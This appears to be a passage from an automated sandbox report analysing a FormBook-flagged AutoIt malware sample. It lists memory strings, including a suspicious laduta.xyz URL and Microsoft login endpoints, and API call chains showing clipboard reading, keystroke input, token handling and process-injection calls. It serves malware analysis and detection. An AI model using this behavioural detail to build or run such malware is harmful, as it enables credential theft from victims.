                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000002C16000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://laduta.xyz/d89m?CviT=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: chkntfs.exe, 00000008.00000003.2809308609.000000000782D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EAEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EAEAFF
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EAED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00EAED6A
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EAEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EAEAFF
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00E9AA57
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EC9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00EC9576

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3993353772.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3995415844.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: 1001-13.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 1001-13.exe, 00000000.00000000.2130539743.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f2cdddb9-2
                Source: 1001-13.exe, 00000000.00000000.2130539743.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_661cf65f-a
                Source: 1001-13.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4df41846-b
                Source: 1001-13.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0433e278-8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D0D3 NtClose,2_2_0042D0D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F60 NtCreateProcessEx,2_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtCreateSection,2_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FE0 NtCreateFile,2_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FA0 NtQuerySection,2_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F90 NtProtectVirtualMemory,2_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EA0 NtAdjustPrivilegesToken,2_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E80 NtReadVirtualMemory,2_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D30 NtUnmapViewOfSection,2_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D00 NtSetInformationFile,2_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DD0 NtDelayExecution,2_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DB0 NtEnumerateKey,2_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C60 NtCreateKey,2_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C00 NtQueryInformationProcess,2_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtOpenProcess,2_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CC0 NtQueryVirtualMemory,2_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CA0 NtQueryInformationToken,2_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673010 NtOpenDirectoryObject,2_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673090 NtSetValueKey,2_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036739B0 NtGetContextThread,2_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D70 NtOpenThread,2_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D10 NtOpenProcessToken,2_2_03673D10
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C4650 NtSuspendThread,LdrInitializeThunk,8_2_048C4650
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C4340 NtSetContextThread,LdrInitializeThunk,8_2_048C4340
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_048C2CA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2C60 NtCreateKey,LdrInitializeThunk,8_2_048C2C60
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_048C2C70
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2DD0 NtDelayExecution,LdrInitializeThunk,8_2_048C2DD0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_048C2DF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_048C2D10
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_048C2D30
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_048C2E80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_048C2EE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2FB0 NtResumeThread,LdrInitializeThunk,8_2_048C2FB0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2FE0 NtCreateFile,LdrInitializeThunk,8_2_048C2FE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2F30 NtCreateSection,LdrInitializeThunk,8_2_048C2F30
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2AD0 NtReadFile,LdrInitializeThunk,8_2_048C2AD0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2AF0 NtWriteFile,LdrInitializeThunk,8_2_048C2AF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_048C2BA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_048C2BE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_048C2BF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2B60 NtClose,LdrInitializeThunk,8_2_048C2B60
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C35C0 NtCreateMutant,LdrInitializeThunk,8_2_048C35C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C39B0 NtGetContextThread,LdrInitializeThunk,8_2_048C39B0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2CC0 NtQueryVirtualMemory,8_2_048C2CC0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2CF0 NtOpenProcess,8_2_048C2CF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2C00 NtQueryInformationProcess,8_2_048C2C00
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2DB0 NtEnumerateKey,8_2_048C2DB0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2D00 NtSetInformationFile,8_2_048C2D00
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2EA0 NtAdjustPrivilegesToken,8_2_048C2EA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2E30 NtWriteVirtualMemory,8_2_048C2E30
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2F90 NtProtectVirtualMemory,8_2_048C2F90
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2FA0 NtQuerySection,8_2_048C2FA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2F60 NtCreateProcessEx,8_2_048C2F60
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2AB0 NtWaitForSingleObject,8_2_048C2AB0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2B80 NtQueryInformationFile,8_2_048C2B80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C3090 NtSetValueKey,8_2_048C3090
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C3010 NtOpenDirectoryObject,8_2_048C3010
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C3D10 NtOpenProcessToken,8_2_048C3D10
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C3D70 NtOpenThread,8_2_048C3D70
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_00599B80 NtCreateFile,8_2_00599B80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_00599CF0 NtReadFile,8_2_00599CF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_00599DE0 NtDeleteFile,8_2_00599DE0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_00599E80 NtClose,8_2_00599E80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_00599FE0 NtAllocateVirtualMemory,8_2_00599FE0
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00E9D5EB
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E91201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00E91201
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E9E8F6
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E380600_2_00E38060
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA20460_2_00EA2046
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E982980_2_00E98298
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E6E4FF0_2_00E6E4FF
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E6676B0_2_00E6676B
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EC48730_2_00EC4873
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E3CAF00_2_00E3CAF0
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E5CAA00_2_00E5CAA0
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E4CC390_2_00E4CC39
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E66DD90_2_00E66DD9
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E4D0630_2_00E4D063
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E391C00_2_00E391C0
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E4B1190_2_00E4B119
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E513940_2_00E51394
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E5781B0_2_00E5781B
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E4997D0_2_00E4997D
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E379200_2_00E37920
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E57A4A0_2_00E57A4A
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E57CA70_2_00E57CA7
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E69EEE0_2_00E69EEE
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EBBE440_2_00EBBE44
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_0148A3100_2_0148A310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017492_2_00401749
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418FC32_2_00418FC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004109532_2_00410953
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019572_2_00401957
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019602_2_00401960
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E9332_2_0040E933
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004171C32_2_004171C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004171BE2_2_004171BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040EA782_2_0040EA78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402AC02_2_00402AC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040EA832_2_0040EA83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402ABD2_2_00402ABD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026702_2_00402670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F6B32_2_0042F6B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017602_2_00401760
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041072B2_2_0041072B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004107332_2_00410733
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FD02_2_00402FD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA3522_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F02_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037003E62_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E02742_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C02C02_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C81582_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036301002_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA1182_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F81CC2_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F41A22_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037001AA2_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D20002_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036407702_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036647502_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C02_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C6E02_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036405352_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037005912_2_03700591
